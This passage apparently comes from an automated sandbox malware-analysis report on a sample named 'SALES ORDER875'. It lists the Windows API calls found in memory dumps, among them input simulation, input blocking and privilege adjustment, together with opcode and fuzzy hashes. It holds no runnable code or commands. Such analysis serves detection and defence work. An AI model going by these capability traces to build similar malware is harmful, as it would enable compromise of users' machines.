                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 003EB25D
                                                                                                                                                                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 003EB270
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InputSendkeybd_event
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3536248340-0
                                                                                                                                                                                    • Opcode ID: 8f1a34598aa1fff13c32749e5e1cce7ce9d55fb5b5998148f8348d4c697d4775
                                                                                                                                                                                    • Instruction ID: e40175ad5020e685e026fa7644b091c87d2150327f7d4a18f4c6ae2e4ddc0952
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f1a34598aa1fff13c32749e5e1cce7ce9d55fb5b5998148f8348d4c697d4775
                                                                                                                                                                                    • Instruction Fuzzy Hash: 40F01D7184429EABDB069FA1C805BEEBBB4FF04305F008419F965A5191C37986119F94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003E11FC), ref: 003E10D4
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,003E11FC), ref: 003E10E9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                                                                    • Opcode ID: 7e2f74dd9d4f07c5770b8d923c1238d54dd06730fb740b3a42b163be62f58da1
                                                                                                                                                                                    • Instruction ID: f2c14ecbe6662f41acecfc994e565141d7d26f1c6cf517c1b00d58e1f573eb8a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e2f74dd9d4f07c5770b8d923c1238d54dd06730fb740b3a42b163be62f58da1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 60E04F32004610AFEB262B51FC05EB37BA9EB04310B20C82DF4A5844B1DB626C90DB54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003B6766,?,?,00000008,?,?,003BFEFE,00000000), ref: 003B6998
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                    • Opcode ID: 7851a8fe1e31d733a0231c5e798643c2e7d8cbce6661930b9b877bb4304e9a11
                                                                                                                                                                                    • Instruction ID: 976cadfc846c13fe36ba9af9b504dfda3362bb3210b0a361b45720f027c1980c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7851a8fe1e31d733a0231c5e798643c2e7d8cbce6661930b9b877bb4304e9a11
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FB17E71610608CFDB16CF28C486BA47BE0FF45368F26865CE999CF6A2C339D981CB40
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                                                                    • Opcode ID: 68453256f96ce26cc0ab8c9ce7b5d1c5b3c1ef724a4c30ed58bee3a0f65da177
                                                                                                                                                                                    • Instruction ID: b817f12ae64a2757a9708983035b8b161cf5f5827eefa195ea1b918f46cb1259
                                                                                                                                                                                    • Opcode Fuzzy Hash: 68453256f96ce26cc0ab8c9ce7b5d1c5b3c1ef724a4c30ed58bee3a0f65da177
                                                                                                                                                                                    • Instruction Fuzzy Hash: D5127E759002299BCF26CF59D9806EEB7B5FF48310F1581AAE849EB251DB309E81DF90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BlockInput.USER32(00000001), ref: 003FEABD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BlockInput
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                                                                    • Opcode ID: 35f4d23409c1582d26fad57d1801390e9f3e83748aba950e2f04b4cbbc0fb786
                                                                                                                                                                                    • Instruction ID: ac58874dd4306a67ba5ecd22f5b14f8d87476c72abb1871c3805af5ab7ee13e7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 35f4d23409c1582d26fad57d1801390e9f3e83748aba950e2f04b4cbbc0fb786
                                                                                                                                                                                    • Instruction Fuzzy Hash: 05E04F312102049FD711EF59D844E9AFBEDBF99760F008466FD49CB361DB70E8408BA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,003A03EE), ref: 003A09DA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                    • Opcode ID: 2bf658d5169a9d0117655870d62683f632a97471cf6464de437822872e9a342e
                                                                                                                                                                                    • Instruction ID: 075e3641d3a297228494006d438f04e4d598f25affac00719ff0d447de200d39
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bf658d5169a9d0117655870d62683f632a97471cf6464de437822872e9a342e
                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                                                    • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                                                                                    • Instruction ID: 69c845c076d4af7d2344b5eac5f160dd4d3b20fbf21e3f20b430a660692ea69a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B51436260C6096ADB3B86288CDF7BF238DDB13340F19051ED886DB682CB1DDE05D356
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0&E
                                                                                                                                                                                    • API String ID: 0-507644601
                                                                                                                                                                                    • Opcode ID: 7d88390f61ab5822e9620fb081b1ca6cc99ffb79cbb7a543759993d584709933
                                                                                                                                                                                    • Instruction ID: a2efc174a431ea7b485daba9a0aef483fd4a3aded5f909233f3408df391e67d3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d88390f61ab5822e9620fb081b1ca6cc99ffb79cbb7a543759993d584709933
                                                                                                                                                                                    • Instruction Fuzzy Hash: CE21D5332206158BDB28CE79C92267E73E5A764310F15862EE4A7C73D1DE79E904CB84
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 0138bdb9580a28bd25e747f0227cb4ff0b71c08c51330c0df32ebd06530e978e
                                                                                                                                                                                    • Instruction ID: 8854d998ea65e4c8b33286d7bd8856842aad0c1f090faba3401642884be88daa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0138bdb9580a28bd25e747f0227cb4ff0b71c08c51330c0df32ebd06530e978e
                                                                                                                                                                                    • Instruction Fuzzy Hash: FC321122E29F014DD7339634C922376A249AFF73C9F56D737E81AB5DA9EB69C4834100
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: a320cd28b4932429d98ffe3c543e792cfbbe49b66b700ded83815159fc4a26b3
                                                                                                                                                                                    • Instruction ID: e543d0a258e940469707da30a5ed40df08303313d13a6efea6ea102e0ca9ca2e
                                                                                                                                                                                    • Opcode Fuzzy Hash: a320cd28b4932429d98ffe3c543e792cfbbe49b66b700ded83815159fc4a26b3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F320433A301468BDF27CF68E49067D7BA5EB45300F2AA56BD849DB792D230DD82DB40
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 3f2c03d928d2e06ce8556542efce9c848f08d174489c68d938bc5e3d37c0a264
                                                                                                                                                                                    • Instruction ID: 1c38242a972f749aaed72430ca36a51ecb0dfadd6490548057cc203a373d29b9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f2c03d928d2e06ce8556542efce9c848f08d174489c68d938bc5e3d37c0a264
                                                                                                                                                                                    • Instruction Fuzzy Hash: 21229E70A046099FDF16DFA4C881BAEB7B6FF44300F244569E816EB291EB36ED51CB50
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: a36bd1f9bdd39091bcc03cda3ececd12b7dadab1a1e32c0742f2691ff9bd837e
                                                                                                                                                                                    • Instruction ID: 930a7992193e67b87f310a190a01f16191a392c3f386d1d20916d8a481bfb020
                                                                                                                                                                                    • Opcode Fuzzy Hash: a36bd1f9bdd39091bcc03cda3ececd12b7dadab1a1e32c0742f2691ff9bd837e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 100292B1A00209EFDF06DF54D881BAEB7B5FF44300F158569E816DB291EB31AE20CB95
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                    • Instruction ID: e2c1f75c1f053b8750a303c791788e781b52086c8be0c4682e99dcc01f3cc8b2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                    • Instruction Fuzzy Hash: BD9173322090A34ADB2F463A853443EFFE5DA933B1B1B079ED4F2CA5C5FE248954D620
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                    • Instruction ID: be152894096a7eedfb29a9cacf661e40bea6cee80c994e2b9836e7b7e18d2ef4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                    • Instruction Fuzzy Hash: 949143722090A34ADB6F427A857403EFFE5DA933A2B1B079DD4F2CA5C1FE24C554D620
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 4fba11a4fc529d4eb4f7daac2329c7e9ab3963648e80248600baa754e7ebd960
                                                                                                                                                                                    • Instruction ID: f87d4c61018c5fa69283067b80ad730bc1b0a6ac429dcac50bae5272423fe03a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fba11a4fc529d4eb4f7daac2329c7e9ab3963648e80248600baa754e7ebd960
                                                                                                                                                                                    • Instruction Fuzzy Hash: 126155B1608749A6DA3B9A288CD6BBF2398DF43710F25091AE843DF791DA119E428365
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 613aeef77148183b08ba1b1e4299455eafa40f72538add3f7dc7a332abdd8f00
                                                                                                                                                                                    • Instruction ID: 017b2689f4a4e292823a3a5c856348b02a3eb67794cb5539e4cf5a28e052453f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 613aeef77148183b08ba1b1e4299455eafa40f72538add3f7dc7a332abdd8f00
                                                                                                                                                                                    • Instruction Fuzzy Hash: E061873160870967DE3B9B288CE6FBF3388EF53744F15095AE943DF681EA12AD428355
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                    • Instruction ID: b40c59ab2fcc07450859648a046de3a5d8ce041505e44eca0d1fdd5b8300ed83
                                                                                                                                                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 418163726090A30DDB6F423A853443EFFE5DA933A1B1B079DD4F2CA5C5EE24C954E660
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1832043021.0000000001A8D000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A8D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1a8d000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 747ddb1b2c3f178d133bec5297ae20c9e9815954376a0193e7faa6748437f4b1
